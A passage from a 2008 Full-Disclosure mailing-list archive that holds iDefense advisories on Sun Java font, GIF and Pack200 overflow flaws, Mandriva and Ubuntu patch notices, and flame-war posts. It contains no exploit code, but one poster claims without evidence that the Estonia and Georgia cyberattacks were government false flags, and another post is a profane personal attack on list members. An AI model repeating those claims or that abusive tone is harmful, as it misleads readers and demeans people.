[Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Heap Overflow Vulnerability Message-ID: <49383259.8080202@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 12.02.08 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 02, 2008 I. BACKGROUND The Sun Java JRE is Sun's implementation of the Java runtime. For more information, see the vendor's site found at the following link. http://www.java.com II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Sun Microsystems Inc.'s Java JRE could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability exists within the font parsing code in the JRE. Various types of fonts are supported, one of which is the TrueType format font. The vulnerability occurs when processing TrueType font files. During parsing, improper bounds checking is performed, which can lead to a heap based buffer overflow. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in the context of the currently logged-on user. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. The content of the overflow buffer undergoes a series of transformations during the font decoding process. The data is not entirely controlled by the attacker, but there is likely enough control to allow for the overwriting of critical data structures in a manner that makes exploitation possible. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Sun Microsystem Inc.'s Java JRE version 1.6.0_07 for Windows. Previous versions and versions for other platforms may also be affected. V. WORKAROUND iDefense is currently unaware of any workarounds for this vulnerability. VI. VENDOR RESPONSE Sun Microsystem Inc. has released a patch which addresses this issue. For more information, consult their advisories at the following URL. http://onesearch.sun.com/onesearch/index.jsp?qt=Bug%206751322&charset=UTF-8 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 09/10/2008 Initial Vendor Notification 10/28/2008 Initial Vendor Reply 11/25/2008 Additional Vendor Feedback 12/02/2008 Coordinated Public Disclosure IX. CREDIT This vulnerability was discovered by Sean Larsson, iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. ~ There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJODJZbjs6HoxIfBkRAk1nAKDt6PFkGPu1QmIuloDG9N9V4yc3FQCglUAH P+jmeMp9co0KtkQe1M57hwk= =1EjC -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Thu Dec 4 21:39:20 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 04 Dec 2008 16:39:20 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java Web Start GIF Decoding Memory Corruption Vulnerability Message-ID: <49384E08.4050808@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 12.02.08 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 02, 2008 I. BACKGROUND Java Web Start (JWS) is a framework built by Sun that is used to run Java applications outside of the browser. It is distributed with the Java Runtime Environment (JRE) installation. JWS is typically launched by clicking on a link in the browser, and results in a separate process being started that is not tied to the JVM inside of the browser. A file contains various parameters that describe the Java application to be run. For more information, see the vendor's site found at the following link. http://java.sun.com/javase/technologies/desktop/javawebstart/index.jsp II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Sun Microsystems Inc.'s Java Web Start could allow an attacker to execute arbitrary code with the privileges of the current user. When JWS starts up, it displays a splash screen. By default, the image displayed on this splash screen is a GIF file provided by Sun, but it is possible for an attacker to pass an arbitrary GIF file to the splash logo parsing code. The vulnerability occurs when parsing this GIF file. The parsing code does not correctly validate several values in the GIF header. This lets an attacker write data outside of the bounds of an allocated heap buffer, which can lead to the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user. There are several ways to exploit this vulnerability. In Internet Explorer 6, after the user visits the malicious web page, no further user interaction is needed. However, in FireFox and Internet Explorer 7, the user will be presented with the 'File Open' confirmation dialog, and will have to accept opening the file. It would also be possible for an attacker to e-mail an infected file to a user, or place it on a shared network drive. In this situation, a targeted user would need to manually open the file. Even though the vulnerability is likely to be triggered through the browser, the actual vulnerability occurs in the Web Start binary. Since this vulnerability allows for relatively precise control of the area and content of memory corrupted, reliable exploitation is possible. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Java Web Start version 1.6_10 and 1.6_07 on Windows and Linux. Previous versions may also be affected. V. WORKAROUND On Windows, it is possible to prevent automatic exploitation by double clicking such a file, or opening it through the browser by removing the file associations for JNLP files. However, if a user specifically selects the Java Web Start application to open the JNLP file, exploitation is still possible. This can be done by removing the registry key for .jnlp in the 'HKEY_CLASSES_ROOT' registry hive. An additional workaround which will prevent all exploitation attempts is to rename the splashscreen library so that Java Web Start will not be able to load it. This file is found in different locations depending on the platform and installation choices, but one such location is: C:\Program Files\Java\jre6\bin\splashscreen.dll Renaming this file to splashscreen.dll.bak will prevent it from being loaded. VI. VENDOR RESPONSE Sun Microsystems Inc. has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/01/2008 Initial Vendor Notification 11/05/2008 Initial Vendor Reply 11/25/2008 Additional Vendor Feedback 12/02/2008 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by regenrecht. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. ~ There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJOE4Ibjs6HoxIfBkRAq7lAKDWvrsT2+KJSfwTUA4hVm0PZBhG2wCg28SF 2g/yCJEYuFi+VeZOd0h9LFI= =F+J5 -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Thu Dec 4 22:00:47 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 04 Dec 2008 17:00:47 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java JRE Pack200 Decompression Integer Overflow Vulnerability Message-ID: <4938530F.7030906@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 12.02.08 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 02, 2008 I. BACKGROUND Pack200 is a compression method introduced by Sun in the 1.5 release of the JRE. It is used to compress Jar files, and is optimized for the compression of Java class files. A Java applet can be compressed using the pack200 tool, and if the browser plugin supports the pack200-gzip encoding it will pass the compressed Jar file to the JRE for unpacking. For more information, see the vendor's site at the following links. http://www.sun.com/java/ http://java.sun.com/j2se/1.5.0/docs/guide/deployment/deployment-guide/pack200.html II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Sun Microsystems Inc.'s Java JRE could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when reading the Pack200 compressed Jar file during decompression. In order to calculate the size of a heap buffer, the code multiplies and adds several integers. The bounds of these values are not checked, and the arithmetic operations can overflow. This results in an undersized buffer being allocated, which leads to a heap based buffer overflow. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in the context of the currently logged-on user. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. Exploitation of heap overflow vulnerabilities on modern operating systems can at times be difficult due to various heap integrity protections. However, the Pack200 code uses a custom allocator that does not contain such integrity checks. Labs testing has demonstrated that code execution is possible on the Linux platform. A similar methodology is likely to be successful on the Windows platform. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Sun Microsystem Inc.'s Java JRE version 1.6.0_07 for Windows and Linux. According to Sun, Pack200 was first introduced in JRE 1.5.0. The latest version of JRE 1.5, 1.5.0_15, does contain the vulnerable code, but the browser plugin does not handle Pack200 encoding. As such, exploitation through the browser does not appear to be possible with JRE 1.5. V. WORKAROUND The library containing the vulnerability can be renamed, which will prevent it from being loaded. This workaround will prevent users from loading Pack200 format Jar files, and from using the pack/unpack tools that come with the JRE. However, normal applets and Java applications will continue to function correctly. The vulnerable library is called 'unpack', and can be found in: "%SYSTEMDRIVE%\Program Files\Java\JAVA VERSION\bin\unpack.dll" on Windows, and in differing locations dependent upon the distribution/platform on Unix systems. VI. VENDOR RESPONSE Sun Microsystem Inc.'s has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-244992-1 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/02/2008 Initial Vendor Notification 11/25/2008 Initial Vendor Reply 12/02/2008 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by regenrecht. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. ~ There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJOFMPbjs6HoxIfBkRAt4LAKDhmj/ozNKfY4ivEyfBzlaEWUIWMwCfWhzp QSiD+sqZ2PGexeNSYO3XVrI= =oup8 -----END PGP SIGNATURE----- From security at mandriva.com Thu Dec 4 22:15:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 04 Dec 2008 15:15:00 -0700 Subject: [Full-disclosure] [ MDVSA-2008:237 ] apache2 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:237 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apache2 Date : December 4, 2008 Affected: Corporate 3.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: A vulnerability was discovered in the mod_proxy module in Apache where it did not limit the number of forwarded interim responses, allowing remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses (CVE-2008-2364). This update also provides HTTP/1.1 compliance fixes. The updated packages have been patched to prevent this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364 _______________________________________________________________________ Updated Packages: Corporate 3.0: 532973a116bcdf63ed72042b819b59cc corporate/3.0/i586/apache2-2.0.48-6.19.C30mdk.i586.rpm e2913623f1876d02e426bbca997f3435 corporate/3.0/i586/apache2-common-2.0.48-6.19.C30mdk.i586.rpm 2e583f46edd8e83d8071e1912fbcced6 corporate/3.0/i586/apache2-devel-2.0.48-6.19.C30mdk.i586.rpm 83b6d9adea62a2c186f2acfb7372a8f0 corporate/3.0/i586/apache2-manual-2.0.48-6.19.C30mdk.i586.rpm f797d9dd78f6a75328f3156f4d97de54 corporate/3.0/i586/apache2-mod_cache-2.0.48-6.19.C30mdk.i586.rpm 1e13b9cf9ed69f69f1700d89e7b0a625 corporate/3.0/i586/apache2-mod_dav-2.0.48-6.19.C30mdk.i586.rpm eeacd8fa60a510fe23a949303aefa934 corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.19.C30mdk.i586.rpm 12978be0a831fb2164e8663e0aa96c16 corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.19.C30mdk.i586.rpm ff7133c4d2f3a18d5ca86398b6a3b482 corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.19.C30mdk.i586.rpm de43091c378ef1b0a465f409d4198c7d corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.19.C30mdk.i586.rpm 2a884bf3c648fe6e45bd1858e7ac8fca corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.19.C30mdk.i586.rpm 435c1058b34b3e5603e8502315d3f1be corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.19.C30mdk.i586.rpm 5a54d1929057b311ab83863fcfc6785b corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.19.C30mdk.i586.rpm 37bb90e385c1571579d604120cd1c1d4 corporate/3.0/i586/apache2-modules-2.0.48-6.19.C30mdk.i586.rpm 377a8d1250fb1276e0c52fe89b63775a corporate/3.0/i586/apache2-source-2.0.48-6.19.C30mdk.i586.rpm 2c6db35de4997018b043181957072182 corporate/3.0/i586/libapr0-2.0.48-6.19.C30mdk.i586.rpm 30da5c4069b7b8ea5b3bb13734ca0058 corporate/3.0/SRPMS/apache2-2.0.48-6.19.C30mdk.src.rpm Corporate 3.0/X86_64: 43cb9996c4ad55ead2a2bba2a618b939 corporate/3.0/x86_64/apache2-2.0.48-6.19.C30mdk.x86_64.rpm 898f1420c5fe218c748281c238da9d00 corporate/3.0/x86_64/apache2-common-2.0.48-6.19.C30mdk.x86_64.rpm b7ca472734ea5776cfecf1dd2315f71d corporate/3.0/x86_64/apache2-devel-2.0.48-6.19.C30mdk.x86_64.rpm 8ebd24059163cd8f8e22eb0203682e41 corporate/3.0/x86_64/apache2-manual-2.0.48-6.19.C30mdk.x86_64.rpm ac6f64c5aabbf463be38023dfb2e30e0 corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.19.C30mdk.x86_64.rpm 2e66000edd688d563645ecf526724899 corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.19.C30mdk.x86_64.rpm d82ba16ad19ebfbb412f033537fe7dfb corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.19.C30mdk.x86_64.rpm e83174382435df2220f7563545543342 corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.19.C30mdk.x86_64.rpm af5d024a4cff0c216d0c02dcbe08ab83 corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.19.C30mdk.x86_64.rpm b6a74826d456381f9c3807d7cdaef8ff corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.19.C30mdk.x86_64.rpm 3e0c99c91a186db1650ab277fb266ddf corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.19.C30mdk.x86_64.rpm 5bcf1224653b851df20d07d6fbb248b6 corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.19.C30mdk.x86_64.rpm c07af351ea84b7d8a0b0de879c9aad2e corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.19.C30mdk.x86_64.rpm fa40774c92468aa0080979674ff473c5 corporate/3.0/x86_64/apache2-modules-2.0.48-6.19.C30mdk.x86_64.rpm a387e498b01b876ee31066aa3a73970a corporate/3.0/x86_64/apache2-source-2.0.48-6.19.C30mdk.x86_64.rpm 659d44dc9615de5b556d35425d628bf7 corporate/3.0/x86_64/lib64apr0-2.0.48-6.19.C30mdk.x86_64.rpm 30da5c4069b7b8ea5b3bb13734ca0058 corporate/3.0/SRPMS/apache2-2.0.48-6.19.C30mdk.src.rpm Multi Network Firewall 2.0: 93eef0301be074129e8c8f67381c09ad mnf/2.0/i586/apache2-2.0.48-6.19.C30mdk.i586.rpm 0dd927e4efb8dc43f2168227d22c1407 mnf/2.0/i586/apache2-common-2.0.48-6.19.C30mdk.i586.rpm 366c8a236e33babca8447b3c3f926c83 mnf/2.0/i586/apache2-devel-2.0.48-6.19.C30mdk.i586.rpm 73490cae06d07885512ff28fb24c1d6c mnf/2.0/i586/apache2-manual-2.0.48-6.19.C30mdk.i586.rpm 8bf01fed207bf8ae9c265be3d3f0e0f5 mnf/2.0/i586/apache2-mod_cache-2.0.48-6.19.C30mdk.i586.rpm b06f622b9c96bfa10cdc4d2067e5826f mnf/2.0/i586/apache2-mod_dav-2.0.48-6.19.C30mdk.i586.rpm c5600da4764bcb84733c16034871ced1 mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.19.C30mdk.i586.rpm cccdb0578c7443e46154a8f64b78a86b mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.19.C30mdk.i586.rpm 67fb4bcf03bef82c78fb42ec3de85b55 mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.19.C30mdk.i586.rpm 20cb9f0132cd5181f6cff7699373d488 mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.19.C30mdk.i586.rpm 1f0f71765b82dd9086c99a2ec98ce458 mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.19.C30mdk.i586.rpm 26d8d7db3f8a8ed9dd22add69cc908cd mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.19.C30mdk.i586.rpm 538e1d3b6eab0b6770de516d9c6e59e4 mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.19.C30mdk.i586.rpm 82674d6c664adb4e9a8539703ee113d7 mnf/2.0/i586/apache2-modules-2.0.48-6.19.C30mdk.i586.rpm d1dc24f4698a7cef16c292ba19302ca1 mnf/2.0/i586/apache2-source-2.0.48-6.19.C30mdk.i586.rpm b83a8c4eda842c3e358d16d22febbe80 mnf/2.0/i586/libapr0-2.0.48-6.19.C30mdk.i586.rpm 5ff603859246c39086f9b6ad300f97c6 mnf/2.0/SRPMS/apache2-2.0.48-6.19.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJOCuNmqjQ0CJFipgRAt+pAKDO9fruRTCR1580NTYdYmnky057aACdFVGo NmJlapeQ2vPQcDIjsktx95s= =5zLR -----END PGP SIGNATURE----- From xploitable at gmail.com Thu Dec 4 22:29:21 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 4 Dec 2008 22:29:21 +0000 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com> References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com> Message-ID: <4b6ee9310812041429y40f606bcq837c44e829a11948@mail.gmail.com> On Thu, Dec 4, 2008 at 4:36 PM, Razi Shaban wrote: > On Thu, Dec 4, 2008 at 5:03 PM, Chris Jeane wrote: >> The Project Chroma Project website reads(I have highlighted the colors in >> black so that they are readable): >> >> Levels crap >> > > On Thu, Dec 4, 2008 at 6:28 PM, Razi Shaban wrote: >> On Thu, Dec 4, 2008 at 6:02 PM, Chris Jeane wrote: >>> Exactly. Which is why there is a need of a system that contains more >>> information and less cookie cutter levels. We still don't know what a >>> cyber-war looks like. One country could attack the transport/power systems >>> of a third party that supplies/supports their target. This is all >>> hypothetical, but there is a high probability of collateral damage. >>> >> >> You misunderstood me. What I was getting at is that your ideas, >> including a "cyber-war" and all this leveling, show that you are about >> as uninformed as n3td3v. Please take your nub spam somewhere else. >> >> -- >> Razi Shaban >> > > To explain the idea of leveling: The internet is a gigantic place. No > matter when and from where you connect, it is out to get you, you > individually. Also, large-scale cyber wars are a constant thing. I am > aware of three very large-scale wars taking place at the moment, does > that increase or decrease the risk any user would be taking by > accessing the internet? Of course not. The concept of basing a > levelling system on a few organized national or private attempts to do > something or another is ridiculous; the Estonian attack compromised > less than 0.0001% of all cyber attacks during that time period. > > The matter of the fact is, attempting to take the hugely complex and > intricate dark side of the internet and summarize it in a color level > is absurd. In fact, attempting to summarize it at all is ridiculous. > Summarizing implies that you know everything about the topic. Anyone > trying to summarize this knows nothing when he/she realizes the > vastness of the internet. > > tl;dr : attempting to summarize the internet is less fruitful than > throwing ice cubes at the sun, but it requires much lesser > intelligence to do the first. > I can't believe people are still using Estonia as an example of a cyber attack, it was a false flag on an epic scale and so obvious to I.T security experts. The government have got to try harder if they want to convince the industry that cyber terrorism is a real threat. But the fact is Estonia and Georgia just weren't convincing enough at least for me, I don't know what others think. And the shutting down of a turbine and posting the video to CNN was just a joke, there was no actual evidence of how the turbine shut down, it could just be a man in the corner flicking a switch, there was no evidence of someone using a computer to shut it down, we were told it was a cyber attack doing it, but no proof or evidence was given to prove it. They didn't even have a guy with a laptop standing beside it or anything like that, really the government are clueless with it comes to cyber security and creating a convincing false flag. When it comes to power stations being shut down through computerised attack, I don't see the threat coming from cyber terrorism, what I see the threat is more is accidental infection, like the three hospitals in London that got shut down last month because of the MyTob worm/ virus, the industry sit up and listen to that kind of thing and take it seriously (or at least I did), but they shouldn't take seriously Estonia, Georgia, DHS turbine videos. Cyber terrorism isn't a real threat in the climate we're in right now, what we should fear is accidental infection like the three hospitals in London. That got my attention more than Estonia, Georgia, DHS turbine video put together, because it was so obvious that the three hospitals in London was a genuine incident and not set up by the powers of be. We should worry more about staff competence being the main threat, not cyber terrorism, but mistakes made by I.T departments and accidental infection onto networks that are sensitive like the three hospitals in London. Please it just makes me cringe when I see people using Estonia as a way to pave political policy and setting up things. There is no cyber terrorism guys, there is staff incompetence and accidental infection that is the biggest worry for me right now, than some people in a cave wanting to carry out an electronic jihad. Money is wasted setting up cyber commands and other stuff, the money should really be spent on making sure the private and public sector and academia is trained to a specific standard so that the three hospitals incident can't happen again. As for the color code thing, thats just a load of wash and bollocks thats not needed, its good for businesses like Symantec and SANS to have alert levels, because fear is part of what they play on to make the money that they do. All the best, n3td3v From labs-no-reply at idefense.com Thu Dec 4 22:35:06 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 04 Dec 2008 17:35:06 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.04.08: Sun Java JRE TrueType Font Parsing Integer Overflow Vulnerability Message-ID: <49385B1A.4020506@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 12.02.08 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 02, 2008 I. BACKGROUND The Sun Java JRE is Sun's implementation of the Java runtime. For more information, see the vendor's site found at the following link. II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Sun Microsystems Inc.'s Java JRE could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability exists within the font parsing code in the JRE. As part of its font API, the JRE provides the ability to load a font from a remote URL. Various types of fonts are supported, one of which is the TrueType format font. The vulnerability occurs when parsing various structures in TrueType font files. During parsing, values are taken from the file, and without being properly validated, used in operations that calculate the number of bytes to allocate for heap buffers. The calculations can overflow, resulting in a potentially exploitable heap overflow. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in the context of the currently logged on user. To exploit this vulnerability, a targeted user must load a malicious web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Sun Microsystem Inc.'s Java JRE version 1.6.0_05 for Windows. Previous versions may also be affected. V. WORKAROUND There is a potential workaround for the vulnerability, but it renders the JRE unusable. It is possible to use the cacls program to change the file permissions on fontmanager.dll. This will prevent the vulnerable library from loading. However, this workaround has a serious impact on the functionality of the JRE. When a webpage attempts to load an applet, the JRE will abort with a runtime error, and the browser will close. VI. VENDOR RESPONSE Sun Microsystem Inc. has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 07/31/2008 Initial Vendor Notification 08/01/2008 Initial Vendor Reply 10/21/2008 Additional Vendor Feedback 11/26/2008 Additional Vendor Feedback 12/02/2008 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by Sebastian Apelt (webmaster at buzzworld.org). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. ~ There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJOFsZbjs6HoxIfBkRAkAXAKCustwzLXcOKMcDJ1sZ0GonmW4F8ACg6Dva mqtkKX2/C9fA7aiyNDRtgbA= =Oo+F -----END PGP SIGNATURE----- From nb at ausics.net Thu Dec 4 22:59:18 2008 From: nb at ausics.net (Noel Butler) Date: Fri, 05 Dec 2008 08:59:18 +1000 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> Message-ID: <1228431557.23932.4.camel@roswell.ausics.net> really, interesting.. how can they contribute to anyone else's benefit, since they are both fucking cockheads and are in almost everyones shitlist filters, infact how do we not know ghost, you are not another one of this delusional fuckheads aliases, you'd have to be, to be even making out like you even read anything those wankas post. On Thu, 2008-12-04 at 13:23, ghost wrote: > Hey mike, how about you stop playing moderator you fucking douche bag. > I for one believe netdev brings alot to this list and encourage him > and ureleet to continue posting. > > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: > > Hye Guys, > > > > I though we had settled the issues offline. Lets restart our > > discussions.. this bickering is highly unnecessary on the list. > > > > -- > > MC > > Security Researcher > > Lead, Project Chroma > > http://sites.google.com/site/projectchromaproject/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/0ddcc2ff/attachment.html From marc.deslauriers at canonical.com Thu Dec 4 22:29:05 2008 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Thu, 04 Dec 2008 17:29:05 -0500 Subject: [Full-disclosure] [USN-687-1] nfs-utils vulnerability Message-ID: <1228429745.352.9.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-687-1 December 04, 2008 nfs-utils vulnerability CVE-2008-4552 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: nfs-kernel-server 1:1.0.7-3ubuntu2.1 Ubuntu 7.10: nfs-kernel-server 1:1.1.1~git-20070709-3ubuntu1.1 Ubuntu 8.04 LTS: nfs-kernel-server 1:1.1.2-2ubuntu2.2 Ubuntu 8.10: nfs-kernel-server 1:1.1.2-4ubuntu1.1 After a standard system upgrade you need to restart nfs services to effect the necessary changes. Details follow: It was discovered that nfs-utils did not properly enforce netgroup restrictions when using TCP Wrappers. Remote attackers could bypass the netgroup restrictions enabled by the administrator and possibly gain access to sensitive information. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7-3ubuntu2.1.diff.gz Size/MD5: 26729 5926412b5a7d5318b1b90747cade6294 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7-3ubuntu2.1.dsc Size/MD5: 698 28b88a044214b04388c55c9e206b48c5 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.0.7.orig.tar.gz Size/MD5: 401155 73d8af4367c79f31f68a4ca45422fd17 amd64 architecture (Athlon64, Opteron, EM64T Xeon): 